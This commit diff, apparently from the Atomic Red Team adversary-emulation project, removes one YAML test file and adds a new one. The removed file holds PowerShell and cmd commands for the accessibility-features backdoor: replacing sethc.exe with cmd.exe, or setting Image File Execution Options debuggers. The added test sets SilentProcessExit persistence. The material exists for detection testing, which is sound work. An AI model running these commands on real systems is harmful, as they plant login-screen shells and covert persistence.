Added new T1546.012 (#2134)

* Update T1546.008.yaml

- https://blog.thinkst.com/2022/09/sensitive-command-token-so-much-offense.html
- https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/registry-entries-for-silent-process-exit

* Update T1546.012.yaml

Added the same test but written in PowerShell.

* Delete T1546.008.yaml

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>

atomics/T1546.008/T1546.008.yaml

@@ -1,65 +0,0 @@
-attack_technique: T1546.008
-display_name: 'Event Triggered Execution: Accessibility Features'
-atomic_tests:
-- name: Attaches Command Prompt as a Debugger to a List of Target Processes
-  auto_generated_guid: 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9
-  description: |
-    Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables.
-
-    Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe.
-  supported_platforms:
-  - windows
-  input_arguments:
-    parent_list:
-      description: |
-        Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe"
-      type: String
-      default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe
-    attached_process:
-      description: |
-        Full path to process to attach to target in #{parent_list}. Default: cmd.exe
-      type: Path
-      default: C:\windows\system32\cmd.exe
-  executor:
-    command: |
-      $input_table = "#{parent_list}".split(",")
-      $Name = "Debugger"
-      $Value = "#{attached_process}"
-      Foreach ($item in $input_table){
-        $item = $item.trim()
-        $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
-        IF(!(Test-Path $registryPath))
-        {
-          New-Item -Path $registryPath -Force
-          New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
-        }
-        ELSE
-        {
-          New-ItemProperty -Path $registryPath -Name $name -Value $Value
-        }
-      }
-    cleanup_command: |
-      $input_table = "#{parent_list}".split(",")
-      Foreach ($item in $input_table)
-      {
-        $item = $item.trim()
-        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f 2>&1 | Out-Null
-      }
-    name: powershell
-    elevation_required: true
-- name: Replace binary of sticky keys
-  auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3
-  description: |
-    Replace sticky keys binary (sethc.exe) with cmd.exe
-  supported_platforms:
-  - windows
-  executor:
-    command: |
-      copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
-      takeown /F C:\Windows\System32\sethc.exe /A
-      icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
-      copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
-    cleanup_command: |
-      copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
-    name: command_prompt
-    elevation_required: true

atomics/T1546.012/T1546.012.yaml

@@ -48,4 +48,46 @@ atomic_tests:
       reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /f >nul 2>&1
       reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /f >nul 2>&1
     name: command_prompt
+    elevation_required: true
+- name: GlobalFlags in Image File Execution Options
+  description: |
+    The following Atomic Test will create a GlobalFlag key under Image File Execution Options, also a SilentProcessExit Key with ReportingMode and MonitorProcess values. This test is similar to a recent CanaryToken that will generate an EventCode 3000 in the Application log when a command, whoami.exe for example, is executed.
+    Upon running Whoami.exe, a command shell will spawn and start calc.exe based on the MonitorProcess value. 
+    Upon successful execution, powershell will modify the registry and spawn calc.exe. An event 3000 will generate in the Application log.
+  supported_platforms:
+  - windows
+  input_arguments:
+    process:
+      description: |
+        Process to monitor
+      type: String
+      default: whoami.exe
+    cmd_to_run:
+      description: |
+        Command to execute
+      type: String
+      default: cmd.exe /c calc.exe
+  executor:
+    command: |
+      $Name = "GlobalFlag"
+      $Value = "512"
+      $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{process}"
+      New-Item -Path $registryPath -Force
+      New-ItemProperty -Path $registryPath -Name $Name -Value $Value -PropertyType DWord -Force
+      $Name = "ReportingMode"
+      $Value = "1"
+      $SilentProcessExit = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{process}"
+      New-Item -Path $SilentProcessExit -Force
+      New-ItemProperty -Path $SilentProcessExit -Name $Name -Value $Value -PropertyType DWord -Force 
+      
+      $Name = "MonitorProcess"
+      $Value = "#{cmd_to_run}"
+      New-ItemProperty -Path $SilentProcessExit -Name $Name -Value $Value -PropertyType String -Force
+      Start-Process whoami.exe
+    cleanup_command: |
+      $SilentProcessExit = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{process}" 
+      Remove-Item $SilentProcessExit -force
+      $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{process}"
+      Remove-Item $registryPath -force
+    name: powershell
     elevation_required: true